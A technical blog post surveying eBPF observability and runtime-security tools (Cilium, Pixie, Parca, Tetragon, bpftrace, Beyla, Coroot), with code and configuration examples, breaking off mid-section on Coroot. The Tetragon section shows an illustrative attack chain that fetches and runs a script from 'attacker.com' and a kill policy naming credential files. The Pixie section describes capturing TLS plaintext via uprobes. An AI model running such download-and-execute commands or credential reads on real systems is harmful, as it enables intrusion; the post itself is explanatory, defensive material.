eBPF Observability 2026: Pixie / Parca / Cilium Hubble / Tetragon / Beyla / Coroot / Falco Deep Dive
2026: The Year eBPF Became Infrastructure's Standard Nervous System
Five years ago, eBPF was treated as "a curious toy for Linux kernel hackers." In 2026, eBPF is the de-facto standard in:
- **Networking**: Cilium powers GKE Dataplane V2 and Azure CNI Powered by Cilium on AKS, is the default CNI in EKS Anywhere, and increasingly replaces kube-proxy
- **Observability**: Pixie, Parca, Beyla, and Coroot made "auto-instrumentation without code changes" real
- **Security**: Tetragon and Falco are the de-facto standards for runtime security
- **Scheduling**: sched_ext (CONFIG_SCHED_CLASS_EXT) landed in the Linux mainline at 6.12; Meta and Google run custom schedulers in production
- **Power**: Kepler entered CNCF Incubating and became the de-facto standard for measuring data-center carbon footprint
This post walks the 2026 eBPF landscape top to bottom: what each tool does, why it works that way, and how Korean and Japanese big-tech adopted it.
1. eBPF in 2026 — The Four Domains Where It Won
Let us draw the big picture first. eBPF is solidifying as the standard in four areas simultaneously.
┌──────────────────────────────────────────────────────────────────────────┐
│ eBPF — De-Facto Standards by Domain (2026) │
├──────────────────────────────────────────────────────────────────────────┤
│ Network / CNI │ Cilium (CNCF Graduated 2023) │
│ - Network observ. │ Hubble (sister project) │
│ - kube-proxy repl. │ Cilium kube-proxy replacement │
│ - Service mesh │ Cilium Service Mesh (sidecarless Envoy) │
├──────────────────────────────────────────────────────────────────────────┤
│ Observ. (tracing) │ Pixie (CNCF Sandbox, New Relic-backed / OSS) │
│ Observ. (profiling) │ Parca / Grafana Pyroscope │
│ Observ. (auto-instr.) │ Grafana Beyla / OpenTelemetry eBPF Collector │
│ Observ. (auto-infer) │ Coroot │
│ k8s diagnostics │ Inspektor Gadget (Microsoft, CNCF Sandbox) │
├──────────────────────────────────────────────────────────────────────────┤
│ Security (runtime) │ Falco (CNCF Graduated 2024) / Tetragon (Isovalent) │
│ - Policy signals │ Cilium Tetragon │
│ - Syscall auditing │ Falco │
├──────────────────────────────────────────────────────────────────────────┤
│ Power / Sustainability│ Kepler (CNCF Incubating) │
│ Scheduling │ sched_ext (Linux 6.12+, Meta scx schedulers) │
└──────────────────────────────────────────────────────────────────────────┘
The interesting thing is that all four domains rest on a single technology: "running verified code safely inside the kernel." How that is possible is the next chapter.
2. eBPF Fundamentals — Why You Can "Safely" Extend the Kernel
eBPF stands for extended Berkeley Packet Filter, but its name is far narrower than what it actually is. The essence is "a virtual machine that lets user-space load small programs that the kernel runs, verified, in kernel context."
Traditional kernel-extension options
1. **Kernel modules (`.ko`)** — Powerful but dangerous; a bad module panics the kernel
2. **kprobes / uprobes / tracepoints** — Safe but data collection is limited
3. **systemtap** — Looks like a scripting language, but ultimately compiles to a kernel module
The eBPF approach
User space Kernel space
────────── ────────────
[C source] [eBPF VM]
│ ▲
▼ │
[Clang/LLVM] ──▶ [eBPF bytecode] ──▶ [Verifier]
│
▼
[JIT compiler]
│
▼
[native code]
│
▼
[hook: kprobe, tracepoint, XDP, sched ...]
The heart is the **verifier**. Before loading, every eBPF program is checked for:
- **No infinite loops** — All backward jumps must have an explicit bound (bounded loops, Linux 5.3+)
- **Only valid memory access** — Pointer tracking, range checks
- **Guaranteed termination** — Per-program instruction cap (1M instructions, Linux 5.2+)
- **Only helper functions** — You cannot call arbitrary kernel functions; only whitelisted helpers
Thanks to the verifier, users can write "code that runs in the kernel yet cannot brick the kernel." This is the magic of eBPF.
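To make the checklist concrete, here is a toy model of those checks in Python. It is only a sketch: the `Insn` type, the `toy_verify` function, and the helper whitelist are invented for illustration, and it rejects every backward jump (as pre-5.3 kernels did) rather than proving loop bounds the way the real verifier does.

```python
from dataclasses import dataclass

ALLOWED_HELPERS = {"bpf_trace_printk", "bpf_get_current_pid_tgid"}  # hypothetical whitelist
MAX_INSNS = 1_000_000  # mirrors the instruction budget mentioned above


@dataclass
class Insn:
    op: str            # "mov", "jmp", "call", or "exit"
    target: int = 0    # jump destination (instruction index) for "jmp"
    helper: str = ""   # helper name for "call"


def toy_verify(prog):
    """Return a list of rejection reasons; an empty list means 'accepted'."""
    errors = []
    if len(prog) > MAX_INSNS:
        errors.append("program too large")
    if not prog or prog[-1].op != "exit":
        errors.append("last instruction must be exit")
    for pc, insn in enumerate(prog):
        if insn.op == "jmp":
            if not 0 <= insn.target < len(prog):
                errors.append(f"insn {pc}: jump out of range")
            elif insn.target <= pc:
                # Simplification: treat every back-edge as a potential infinite loop.
                errors.append(f"insn {pc}: backward jump (possible unbounded loop)")
        elif insn.op == "call" and insn.helper not in ALLOWED_HELPERS:
            errors.append(f"insn {pc}: helper {insn.helper!r} not allowed")
    return errors


good = [Insn("mov"), Insn("call", helper="bpf_trace_printk"), Insn("exit")]
bad = [Insn("mov"), Insn("call", helper="panic"), Insn("jmp", target=0), Insn("exit")]
print(toy_verify(good))
print(toy_verify(bad))
```

The real verifier goes much further (it simulates register and stack state along every path), but the shape is the same: a static pass that either accepts the whole program or refuses to load it.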
Lifecycle of an eBPF program
// Hello eBPF (libbpf style)
#include <linux/bpf.h>
#include <bpf/bpf_helpers.h>

SEC("tracepoint/syscalls/sys_enter_openat")
int trace_openat(void *ctx) {
    char msg[] = "openat called\n";
    bpf_trace_printk(msg, sizeof(msg));
    return 0;
}

char LICENSE[] SEC("license") = "GPL";
Compile
clang -O2 -target bpf -c hello.c -o hello.o
Load and attach (needs a recent bpftool with `autoattach`; `bpftool prog attach` only covers socket and flow-dissector attach types, not tracepoints)
sudo bpftool prog load hello.o /sys/fs/bpf/hello autoattach
Read the trace
sudo cat /sys/kernel/debug/tracing/trace_pipe
This tiny example shows the magic: every time openat is called, the kernel runs our verified code. We can track which files any process opens.
3. The CO-RE Revolution — Compile Once, Run Everywhere
The biggest problem with early eBPF was **kernel-version compatibility**. Internal kernel structs differ between versions and build configurations. For example, a given `task_struct` field might sit at offset 200 on 5.4, 224 on 5.10, and 248 on 6.5 (illustrative numbers).
So old-school BCC took the approach of "compile at runtime with Clang against the kernel headers." Downsides:
- Every node needs Clang + kernel headers installed (hundreds of MB)
- Startup takes seconds to tens of seconds
- Running a compiler in production gives ops nightmares
How CO-RE works
CO-RE solves this with BTF (BPF Type Format) and libbpf's relocation feature.
At compile time:
eBPF.c ── Clang/LLVM ──▶ BPF bytecode + BTF info (struct-field reference metadata)
At runtime:
Compare against the running kernel's BTF (/sys/kernel/btf/vmlinux)
──▶ libbpf recomputes offsets
──▶ Patches the memory-access instructions in the bytecode
──▶ Passes the verifier and loads
The key macro is `BPF_CORE_READ()`. Old style:
// BCC style (runtime compilation)
struct task_struct *task = (struct task_struct *)bpf_get_current_task();
pid_t ppid;
bpf_probe_read(&ppid, sizeof(ppid), &task->real_parent->tgid);
Modern style:
// CO-RE style (compile once, run anywhere)
struct task_struct *task = (struct task_struct *)bpf_get_current_task();
pid_t ppid = BPF_CORE_READ(task, real_parent, tgid);
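The impact of this small change is enormous. **Tools no longer have to bundle Clang and kernel headers, so images that used to run to hundreds of megabytes can shrink to a few megabytes**, and startup no longer waits on a compile step. Newer eBPF tools such as Tetragon, Inspektor Gadget, Parca Agent, and Falco's modern probe are built on CO-RE, while some long-standing projects still carry runtime-compilation paths.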
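The relocation step is easier to picture with a small simulation. The sketch below is not libbpf: the `KERNEL_BTF` table, the `PROGRAM` format, and the offsets are all made up, and stand in for the kernel's BTF and the relocation records Clang emits.

```python
# Hypothetical per-kernel layouts, standing in for /sys/kernel/btf/vmlinux.
KERNEL_BTF = {
    "5.4": {"task_struct": {"real_parent": 200, "tgid": 96}},
    "6.5": {"task_struct": {"real_parent": 248, "tgid": 104}},
}

# "Compiled" program: each load carries a relocation record (struct, field).
# The offset stored in the instruction is only the build-time guess.
PROGRAM = [
    {"op": "load", "offset": 200, "reloc": ("task_struct", "real_parent")},
    {"op": "load", "offset": 96, "reloc": ("task_struct", "tgid")},
]


def relocate(program, kernel_version):
    """Return a copy of the program with offsets patched for the target kernel."""
    layout = KERNEL_BTF[kernel_version]
    patched = []
    for insn in program:
        struct_name, field = insn["reloc"]
        patched.append({**insn, "offset": layout[struct_name][field]})
    return patched


for version in KERNEL_BTF:
    print(version, [insn["offset"] for insn in relocate(PROGRAM, version)])
```

The same "binary" yields different offsets per kernel without being recompiled, which is the whole point of CO-RE.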
BTF required, headers not
As of 2026, Ubuntu 22.04+, RHEL 9+, Amazon Linux 2023+, and Bottlerocket all ship with BTF by default (`/sys/kernel/btf/vmlinux`). For older kernels, BTFHub (https://github.com/aquasecurity/btfhub) provides external BTF.
4. Pixie — The Definitive Kubernetes Auto-Instrumentation Tool
Pixie is the Kubernetes observability platform that New Relic acquired and open-sourced (Apache 2.0). It is a CNCF Sandbox project and was rumored as an Incubating candidate going into 2026.
What Pixie solves
Traditional APM forces one of these on you:
1. Install an agent on every service (Datadog, New Relic APM)
2. Embed an OpenTelemetry SDK in every service via code
3. Deploy a service-mesh sidecar (Istio, Linkerd)
All three require **code or deployment changes**. Pixie's promise is different. **"Install in your cluster with one YAML, and every flow is visible immediately."**
Architecture
┌──────────────────────────────┐
│ Pixie UI / Pixie CLI │
│ PxL query language (Python-ish) │
└──────────────┬───────────────┘
│ gRPC
┌───────────────▼─────────────────┐
│ Pixie Cloud (optional, self-hostable) │
│ or Pixie Vizier (in-cluster) │
└───────────────┬─────────────────┘
│
┌────────────────────────────┼────────────────────────────┐
▼ ▼ ▼
┌───────┐ ┌───────┐ ┌───────┐
│ PEM │ │ PEM │ │ PEM │
│ (node)│ │ (node)│ │ (node)│
└─┬─────┘ └─┬─────┘ └─┬─────┘
│ eBPF │ eBPF │ eBPF
▼ ▼ ▼
[kernel traces] [kernel traces] [kernel traces]
PEM = Pixie Edge Module (DaemonSet)
Data is held in node memory for 24 hours only (long-term storage via Iceberg/S3 export)
A PEM runs per node and captures the following automatically:
- HTTP/HTTP2/gRPC requests and responses (headers + body)
- MySQL, PostgreSQL, Redis, Kafka, MongoDB queries
- DNS queries
- TCP/UDP connections, retransmits, RTT
- CPU profiles (perf_event)
TLS is visible
The most impressive bit. **HTTPS traffic is visible.** How? Pixie attaches uprobes to OpenSSL's `SSL_read` / `SSL_write` and observes the plaintext right before encryption and right after decryption.
// Simplified pseudo-code
SEC("uprobe/SSL_write")
int trace_ssl_write(struct pt_regs *ctx) {
    void *buf = (void *)PT_REGS_PARM2(ctx);   // plaintext buffer passed to SSL_write
    size_t len = (size_t)PT_REGS_PARM3(ctx);  // number of bytes the caller wants written
    // Send the first N bytes of buf into a perf buffer
    ...
    return 0;
}
Go binaries are statically linked, which is trickier. Pixie locates Go's TLS-library symbols (`crypto/tls.(*Conn).Read/Write`) and hooks uprobes on them.
PxL query example
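Latency percentiles per HTTP endpoint over the last 5 minutes (sort by p99 in the UI to find the slowest)
import px
df = px.DataFrame(table='http_events', start_time='-5m')
df = df[df.resp_status >= 200]
df.endpoint = df.req_path
df = df.groupby('endpoint').agg(
    latency_quantiles=('latency', px.quantiles),
    count=('latency', px.count),
)
# px.quantiles returns a JSON blob; pluck the individual percentiles out of it
df.p50 = px.pluck_float64(df.latency_quantiles, 'p50')
df.p99 = px.pluck_float64(df.latency_quantiles, 'p99')
df = df.drop(['latency_quantiles'])
px.display(df)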
PxL is a Python-flavored DSL, but is actually compiled and executed by a C++ backend. All queries hit the in-memory data on each PEM, so they are fast.
Limits
- **No long-term storage**: Default retention is roughly 24 hours. To keep data longer, export it through Pixie's OpenTelemetry export and ship it to another backend (Honeycomb, Tempo, Iceberg)
- **Resource usage**: A PEM typically consumes 1–2 GB of memory per node, which can be heavy on small nodes
- **HTTPS relies on uprobe matching**: Statically linked OpenSSL or unusual TLS libraries make capture tricky
Still, Pixie is the definitive showcase of "what eBPF auto-instrumentation can do."
5. Parca — Continuous Profiling
Parca is the open-source continuous-profiling tool from Polar Signals (the company founded by Frederic Branczyk). It is CNCF Sandbox as of 2026.
What "continuous profiling" means
Traditional profiling was reactive: "Something is wrong, so let me run perf record now and analyze." Continuous profiling is **always-on, low-overhead (typically 1%) profiling of every process, stored for later**. Then post-hoc analysis like "memory spiked last Tuesday at 3 PM" becomes possible.
What sets Parca apart
Alternatives:
- perf record → manual, data is huge
- py-spy / pyroscope → per-language agent
- Datadog Continuous Profiler → paid, proprietary
Parca's take:
- parca-agent: a single DaemonSet per node
- eBPF-based stack sampling driven by perf_event (Parca Agent samples at 19 Hz per logical CPU by default)
- One agent for Go, Rust, C/C++, Python, Java, Node.js
- DWARF-based stack unwinding (no libunwind, all in the kernel)
- pprof-compatible format (Parca Server)
The pain of per-node stack sampling
Sampling stacks at a fixed frequency (99 Hz is the classic perf choice; Parca Agent defaults to a lower 19 Hz) means capturing the call stack of whatever is running that many times per second on every CPU. The canonical way is to walk the frame-pointer chain (the rbp register on x86-64), but modern compilers omit frame pointers for optimization (`-fomit-frame-pointer`).
Two ways out:
1. **Re-enable frame pointers**: Fedora 38+ and Ubuntu 24.04+ now ship their entire library set with frame pointers enabled (a genuinely big shift)
2. **DWARF-based unwinding**: Read the call-frame information in the `.eh_frame` section, which gives, for each instruction address, the rule for recovering the caller's stack pointer and return address. Parca does this **inside eBPF**
Parca pre-loads DWARF unwind info into BPF maps and uses it at sampling time to reconstruct call stacks. This technique was developed by Polar Signals together with the Linux community, and today the Grafana Pyroscope and Datadog profilers all take the same approach.
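For comparison, the frame-pointer path is simple enough to simulate in a few lines. The sketch below walks a fake stack held in a dictionary; the addresses, the `STACK` contents, and the symbol table are invented. DWARF-based unwinding replaces the fixed "saved rbp, then return address" rule with a per-address table lookup, which is what makes it so much harder to do inside eBPF.

```python
def walk_frame_pointers(memory, rbp, max_depth=64):
    """Follow the saved-rbp chain and collect return addresses.

    x86-64 convention with frame pointers enabled:
      memory[rbp]     -> caller's saved rbp
      memory[rbp + 8] -> return address into the caller
    """
    return_addresses = []
    for _ in range(max_depth):  # bounded loop, as an eBPF unwinder must be
        if rbp == 0 or rbp not in memory or rbp + 8 not in memory:
            break
        return_addresses.append(memory[rbp + 8])
        rbp = memory[rbp]
    return return_addresses


# Hypothetical stack: leaf frame at 0x1000, its caller at 0x1040, main at 0x1080.
STACK = {
    0x1000: 0x1040, 0x1008: 0x401234,
    0x1040: 0x1080, 0x1048: 0x401500,
    0x1080: 0x0,    0x1088: 0x401900,
}
SYMBOLS = {0x401234: "handle_request", 0x401500: "serve", 0x401900: "main"}

print([SYMBOLS[addr] for addr in walk_frame_pointers(STACK, 0x1000)])
```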
Flame graphs
The collected stack data is rendered as a flame graph — the visualization Brendan Gregg invented.
┌──────────────────────────────────────┐
│ main (100%) │
├────────────┬─────────────────────────┤
│ http (80%) │ db.query (15%) │
├─────┬──────┼────────┬────────────────┤
│a(40)│b(40) │parse(5)│ exec(10) │
└─────┴──────┴────────┴────────────────┘
Horizontal width = CPU-time share
Down = call depth (this sketch puts the root at the top, icicle-style; classic flame graphs grow upward)
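Under the hood, a flame graph is just a count of identical stacks. A minimal sketch, using made-up samples that match the diagram above, shows the "folded stacks" text format that flame-graph tooling consumes and how a frame's width falls out of the counts:

```python
from collections import Counter

# Hypothetical samples: one call stack (root first) per sampling tick.
samples = (
    [("main", "http", "a")] * 40
    + [("main", "http", "b")] * 40
    + [("main", "db.query", "parse")] * 5
    + [("main", "db.query", "exec")] * 10
    + [("main",)] * 5
)


def fold(stacks):
    """Collapse identical stacks into 'frame;frame;frame count' lines."""
    counts = Counter(stacks)
    return [f"{';'.join(stack)} {n}" for stack, n in sorted(counts.items())]


def inclusive_share(stacks, frame):
    """Fraction of samples in which `frame` appears anywhere on the stack."""
    return sum(frame in stack for stack in stacks) / len(stacks)


print("\n".join(fold(samples)))
print(f"http: {inclusive_share(samples, 'http'):.0%}")
```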
Parca vs Pyroscope vs Datadog
| Tool | Open source | Single agent, many langs | DWARF unwinding | Backend |
|------|-------------|--------------------------|-----------------|---------|
| Parca | Apache 2.0 | Yes | Yes | Parca Server (Go) |
| Grafana Pyroscope | AGPL | Partial (separate eBPF agent) | Yes | Pyroscope Server |
| Datadog | Closed | Yes | Yes | SaaS |
| pprof + go pprof | Standard | No | Compiler-dependent | File |
The 2026 trend is convergence on Grafana Pyroscope + Parca-compatible format. pprof has effectively become the standard interchange format.
6. Cilium Hubble — Kubernetes Network Observability
Cilium became CNCF Graduated in 2023, and as of 2026 it is the dataplane behind GKE Dataplane V2 and Azure CNI Powered by Cilium on AKS, and the default CNI in EKS Anywhere. Hubble is Cilium's sister project for observing network flows.
Limits of kube-proxy
The classic kube-proxy uses iptables or IPVS rules for ClusterIP routing. Problems:
- As the service count grows, iptables rules balloon into tens of thousands — O(n) matching per packet (IPVS is hashed but has conntrack overhead)
- No L7 routing
- Poor policy visibility (no way to see why a packet was dropped)
Cilium's approach
TC ingress hook ──▶ eBPF program ──▶ routing / policy / logging
├─▶ DROP / FORWARD / REDIRECT
└─▶ emit event to Hubble
kube-proxy replacement: service mappings live in BPF maps, O(1) lookup per packet
Network policy: L3/L4 evaluated in BPF; L7 rules enforced by the per-node Envoy proxy that BPF redirects traffic to
Service mesh: Envoy runs sidecarless (per-node)
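The O(n) versus O(1) difference can be illustrated with a deliberately simplified model. The service list and backend addresses below are invented, and real iptables chains are more structured than a flat list, so read this as a sketch of the scaling behaviour only.

```python
import ipaddress

# Hypothetical services: 10,000 ClusterIP:port pairs, each mapped to a backend.
services = [
    (str(ipaddress.ip_address("10.96.0.0") + i), 80, f"10.0.{i // 256}.{i % 256}:8080")
    for i in range(10_000)
]

# iptables-style: an ordered rule list that is scanned until one matches.
rule_list = services

# BPF-map-style: a hash table keyed by (cluster_ip, port).
service_map = {(ip, port): backend for ip, port, backend in services}


def lookup_linear(ip, port):
    """Return (backend, rules_examined) by scanning rules in order."""
    for examined, (rule_ip, rule_port, backend) in enumerate(rule_list, start=1):
        if (rule_ip, rule_port) == (ip, port):
            return backend, examined
    return None, len(rule_list)


def lookup_map(ip, port):
    """Return the backend with a single hash lookup."""
    return service_map.get((ip, port))


last_ip = services[-1][0]
print(lookup_linear(last_ip, 80))  # examines every rule before matching
print(lookup_map(last_ip, 80))     # one lookup regardless of service count
```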
Hubble UI
Hubble collects the flow events Cilium emits and presents:
- Real-time service-dependency graph
- L7 metrics (HTTP status distribution, method distribution)
- DNS query flows
- Policy violations (with DENY reason included)
Live flow tail
hubble observe --namespace prod --follow
Mar 15 10:23:01.234 prod/frontend-7f6d-xqz -> prod/api-3-abc:8080 SYN
Mar 15 10:23:01.235 prod/frontend-7f6d-xqz -> prod/api-3-abc:8080 ACK
Mar 15 10:23:01.240 prod/frontend-7f6d-xqz -> prod/api-3-abc:8080 HTTP/1.1 GET /v1/users/me (200, 5ms)
L7 stats
hubble observe --http-status 500 --since 5m --output table
Cilium Network Policy example
apiVersion: cilium.io/v2
kind: CiliumNetworkPolicy
metadata:
  name: api-only-from-frontend
spec:
  endpointSelector:
    matchLabels:
      app: api
  ingress:
    - fromEndpoints:
        - matchLabels:
            app: frontend
      toPorts:
        - ports:
            - port: '8080'
              protocol: TCP
          rules:
            http:
              - method: GET
                path: '/v1/.*'
              - method: POST
                path: '/v1/orders'
This policy enforces all the way down to L7 (HTTP method + path). The classic NetworkPolicy cannot do that.
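What the two HTTP rules admit is easy to check with a tiny evaluator. This is a sketch of the matching semantics only, assuming that both `method` and `path` are regular expressions that must match the whole value; the `is_allowed` function is hypothetical and has nothing to do with how Cilium and Envoy implement enforcement.

```python
import re

# The two HTTP rules from the policy above.
HTTP_RULES = [
    {"method": "GET", "path": "/v1/.*"},
    {"method": "POST", "path": "/v1/orders"},
]


def is_allowed(method, path, rules=HTTP_RULES):
    """Allow the request if any rule matches both method and path.

    Assumption: both fields are regexes that must match the whole value.
    """
    return any(
        re.fullmatch(rule["method"], method) and re.fullmatch(rule["path"], path)
        for rule in rules
    )


for request in [("GET", "/v1/users/me"), ("POST", "/v1/orders"),
                ("POST", "/v1/users"), ("DELETE", "/v1/orders")]:
    print(request, "ALLOW" if is_allowed(*request) else "DENY")
```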
Hubble Timescape
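Hubble Timescape, part of Isovalent's enterprise distribution of Cilium, persists Hubble flow data to an external long-term store (ClickHouse in Isovalent's documentation), enabling "what did our traffic patterns look like last week?" analysis. That history is critical for post-incident forensics.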
7. Tetragon — Isovalent's Security Observability
Tetragon is the security-observability / runtime-security tool from Isovalent (now part of Cisco), the creators of Cilium. It is developed under the CNCF Cilium project and reached 1.0 in late 2023.
How it differs from Falco
Falco hooks system calls and evaluates rules. Tetragon is similar but differs as follows:
| Aspect | Falco | Tetragon |
|--------|-------|----------|
| Hook approach | libbpf modern eBPF + kernel module (legacy) | Pure eBPF, CO-RE based |
| Policy language | YAML rules (Sysdig-compatible) | TracingPolicy (CRD) |
| Real-time enforcement | None built in (detection and alerting; response via external tooling) | Strong (Sigkill, Override) |
| Process context | Rich | Rich + parent / grandparent / exec ancestry |
| k8s integration | Good | Very strong (auto-attaches Pod metadata) |
What real-time enforcement means
Tetragon can issue SIGKILL to a violating process via the BPF helper `bpf_send_signal()`. Meaning: this is not "detect then notify" — it is "detect and block in the same breath."
apiVersion: cilium.io/v1alpha1
kind: TracingPolicy
metadata:
  name: block-sensitive-file-access
spec:
  kprobes:
    - call: 'security_file_open'
      syscall: false
      args:
        - index: 0
          type: 'file'
      selectors:
        - matchArgs:
            - index: 0
              operator: 'Prefix'
              values:
                - '/etc/shadow'
                - '/etc/passwd' # caution: many ordinary programs read this file
          matchActions:
            - action: 'Sigkill'
Once this policy is in place, the instant any process tries to open `/etc/shadow`, SIGKILL fires from inside the kernel. There is no user-space agent waking up to make a decision. This works because verified code runs directly inside the kernel.
Process ancestry
Another Tetragon highlight: every event can trace "how this process came to exist."
process sshd (pid 1234, uid 0)
└─ bash (pid 1235, uid 0)
└─ wget http://attacker.com/x.sh (pid 1240, uid 0)
└─ sh x.sh (pid 1241, uid 0)
└─ /tmp/x (pid 1245, uid 0) <- violation
The ancestry is built by walking `task_struct->real_parent` in eBPF. In incident analysis, you can immediately see "where this small violation actually started."
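The parent walk itself is a short loop. Here is a user-space sketch over a made-up process table that mirrors the tree above; the `PROCESSES` dictionary and the `ancestry` function are illustrative and are not Tetragon's data structures.

```python
# Hypothetical process table: pid -> (parent pid, command line).
PROCESSES = {
    1: (0, "systemd"),
    1234: (1, "sshd"),
    1235: (1234, "bash"),
    1240: (1235, "wget http://attacker.com/x.sh"),
    1241: (1240, "sh x.sh"),
    1245: (1241, "/tmp/x"),
}


def ancestry(pid, table, max_depth=32):
    """Return command lines from the given process up to the root."""
    chain = []
    while pid in table and len(chain) < max_depth:  # bounded, like an eBPF loop
        parent, cmd = table[pid]
        chain.append(cmd)
        pid = parent
    return chain


print(" <- ".join(ancestry(1245, PROCESSES)))
```

The depth cap matters for the same reason it does in the kernel: the walk has to terminate even if the table is inconsistent.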
8. BCC + bpftrace — The Classics for Ad-Hoc Tracing
If the tools above are "production daemons," BCC and bpftrace are the "engineer SSHes in and runs them directly" tools. They became standard after Brendan Gregg's book "BPF Performance Tools" (2019).
BCC vs bpftrace
- **BCC**: A larger framework with Python or C++ wrappers. Lots of complex tools (`opensnoop`, `execsnoop`, `biolatency`, `tcplife`, ... 200+ tools)
- **bpftrace**: An awk-style one-line DSL. Lets you trace on the spot
bpftrace one-liner magic
1) Which process opens which file (3 seconds)
sudo bpftrace -e 'tracepoint:syscalls:sys_enter_openat { printf("%s opens %s\n", comm, str(args->filename)); }' -c 'sleep 3'
2) VFS read latency histogram (time spent inside vfs_read, not raw disk I/O)
sudo bpftrace -e '
kprobe:vfs_read { @start[tid] = nsecs; }
kretprobe:vfs_read /@start[tid]/ {
@ns = hist(nsecs - @start[tid]);
delete(@start[tid]);
}
'
3) Which kernel stacks are on-CPU most often (99 Hz sampling for 10 seconds)
sudo bpftrace -e 'profile:hz:99 { @[kstack(3)] = count(); }' -c 'sleep 10' | head -20
4) Where TCP retransmits are going
sudo bpftrace -e '
kprobe:tcp_retransmit_skb {
$sk = (struct sock *)arg0;
printf("retransmit %s\n", ntop($sk->__sk_common.skc_daddr));
}
'
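The `hist()` call in the second one-liner buckets values by powers of two, which is why bpftrace histograms stay readable across several orders of magnitude. A rough Python equivalent of that bucketing, with invented latency values and hypothetical function names, looks like this:

```python
from collections import Counter


def log2_bucket(value):
    """Return the [low, high) power-of-two bucket containing a non-negative int."""
    if value < 1:
        return (0, 1)
    low = 1 << (value.bit_length() - 1)
    return (low, low * 2)


def hist(values):
    """Count values per power-of-two bucket, ordered by bucket start."""
    counts = Counter(log2_bucket(v) for v in values)
    return dict(sorted(counts.items()))


latencies_ns = [850, 900, 1_100, 1_500, 3_000, 70_000]  # hypothetical samples
for (low, high), n in hist(latencies_ns).items():
    print(f"[{low}, {high}) {'@' * n}")
```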
BCC's standard toolset
After installing `bpfcc-tools` (Ubuntu/Debian, where the tools carry a `-bpfcc` suffix and live in `/usr/sbin/`) or `bcc-tools` (RHEL/Fedora, installed under `/usr/share/bcc/tools/` without the suffix), you can run:
Which processes are starting
sudo execsnoop-bpfcc
Which files are being opened
sudo opensnoop-bpfcc
TCP connection lifetimes
sudo tcplife-bpfcc
Block-I/O latency histogram
sudo biolatency-bpfcc
Top CPU consumers
sudo profile-bpfcc 10
Why these tools matter
Pixie, Parca, and Hubble above are "always-on" tools. BCC/bpftrace are the "give me an answer right now during this incident" tools. You need both.
Brendan Gregg's "Systems Performance" (2nd ed., 2020) and "BPF Performance Tools" (2019) are the canonical references for this space.
9. OpenTelemetry eBPF Collector + Grafana Beyla — Standardizing Auto-Instrumentation
OpenTelemetry is the CNCF observability standard. In 2025, eBPF-based auto-instrumentation solidified along two paths.
OpenTelemetry eBPF Collector
opentelemetry-ebpf is an official OpenTelemetry component, driven primarily by Splunk. It auto-collects:
- Network-flow metrics (kprobe based)
- DNS, TCP, UDP stats
- Pod/Service/Workload labeling (k8s integration)
It exports OTLP, so any backend (Tempo, Jaeger, Honeycomb, Datadog) can consume it.
Grafana Beyla
Beyla is Grafana Labs' Go-based eBPF auto-instrumentation agent. It reached 1.0 (GA) in late 2023. Features:
- Auto-recognizes HTTP, gRPC, SQL, Redis traffic via uprobes
- Captures plaintext from TLS traffic by hooking OpenSSL/Go TLS functions
- Extracts distributed-trace context (W3C traceparent)
- Exports to OTLP, Prometheus, Mimir
Plain run (pick the process to follow via BEYLA_EXECUTABLE_NAME)
BEYLA_EXECUTABLE_NAME=myapp \
BEYLA_PROMETHEUS_PORT=9090 \
BEYLA_OPEN_PORT=8080 \
sudo -E beyla # -E keeps the BEYLA_* variables, which sudo would otherwise strip
DaemonSet in k8s
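apiVersion: apps/v1
kind: DaemonSet
metadata:
  name: beyla
spec:
  selector: # required for apps/v1 DaemonSets
    matchLabels:
      app: beyla
  template:
    metadata:
      labels:
        app: beyla
    spec:
      hostPID: true # to see processes outside this container
      containers:
        - name: beyla
          image: grafana/beyla:latest
          securityContext:
            privileged: true # simplification; really only CAP_SYS_ADMIN + CAP_BPF needed
          env:
            - name: BEYLA_OPEN_PORT
              value: '80,443,8000-8999' # instrument anything listening on these ports
            - name: BEYLA_KUBE_METADATA_ENABLE
              value: 'true' # decorate telemetry with Pod / Deployment metadata
            - name: OTEL_EXPORTER_OTLP_ENDPOINT
              value: 'http://otel-collector:4318'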
Beyla vs Pixie
| Aspect | Beyla | Pixie |
|--------|-------|-------|
| Backed by | Grafana Labs | New Relic |
| License | Apache 2.0 | Apache 2.0 |
| Data model | OTLP (standard) | PxL queries (custom) |
| Backend | Tempo, Jaeger, any OTLP backend | Pixie Vizier + export |
| Strength | OTel-ecosystem integration | In-memory queries, rich UI |
The 2026 direction is clear. **Auto-instrumentation is, in practice, all converging on OpenTelemetry**, and Beyla / Pixie / Coroot are paving that road.
10. Coroot — Auto-Inferred Observability
Coroot is a relatively new project that surfaced in 2023, but its "auto-inferred" observability approach has rapidly caught on. Open source (Apache 2.0).
What "auto-inferred" means
Traditional observability forces a human to define:
- Which metrics constitute an SLO
- Which services depend on which other services
- What the alerting thresholds are
- Which log patterns are errors
Coroot's promise: **"observe all of that with eBPF and infer the rest automatically."**
What Coroot infers automatically:
1. Service-dependency graph (from network flows)
2. SLO candidates (from HTTP/gRPC traffic analysis)
3. Database query grouping (auto-normalized, auto-classified)
4. Alert candidates (based on anomaly detection)
5. Cost / resource-efficiency analysis
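The first item, inferring a dependency graph from observed flows, comes down to an aggregation. The sketch below uses invented flow records and a hypothetical `build_edges` function. It shows the idea only and does not reflect Coroot's actual pipeline or schema.

```python
from collections import defaultdict

# Hypothetical flow records, as a node agent might report them.
FLOWS = [
    {"src": "frontend", "dst": "api", "status": 200, "latency_ms": 12},
    {"src": "frontend", "dst": "api", "status": 500, "latency_ms": 40},
    {"src": "api", "dst": "postgres", "status": 200, "latency_ms": 3},
    {"src": "api", "dst": "postgres", "status": 200, "latency_ms": 5},
]


def build_edges(flows):
    """Aggregate flows into per-edge request counts, error rates, and max latency."""
    acc = defaultdict(lambda: {"requests": 0, "errors": 0, "max_latency_ms": 0})
    for flow in flows:
        edge = acc[(flow["src"], flow["dst"])]
        edge["requests"] += 1
        edge["errors"] += int(flow["status"] >= 500)
        edge["max_latency_ms"] = max(edge["max_latency_ms"], flow["latency_ms"])
    return {
        key: {**edge, "error_rate": edge["errors"] / edge["requests"]}
        for key, edge in acc.items()
    }


for (src, dst), stats in build_edges(FLOWS).items():
    print(f"{src} -> {dst}: {stats}")
```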
Architecture
Coroot also runs per-node agents (coroot-node-agent). Those agents capture via eBPF:
- TCP connections, RTT, retransmits
- HTTP/HTTPS (TLS captured with uprobes)
- DB protocols (PostgreSQL, MySQL, Redis, MongoDB)
- File I/O, CPU use
The collected data is stored by Coroot Server (Go) on Prometheus and ClickHouse backends.
What you see
Open Coroot's UI and you immediately see things like:
- A "frontend -> api -> postgres -> s3" dependency graph
- Per-edge RPS, p99 latency, error rate
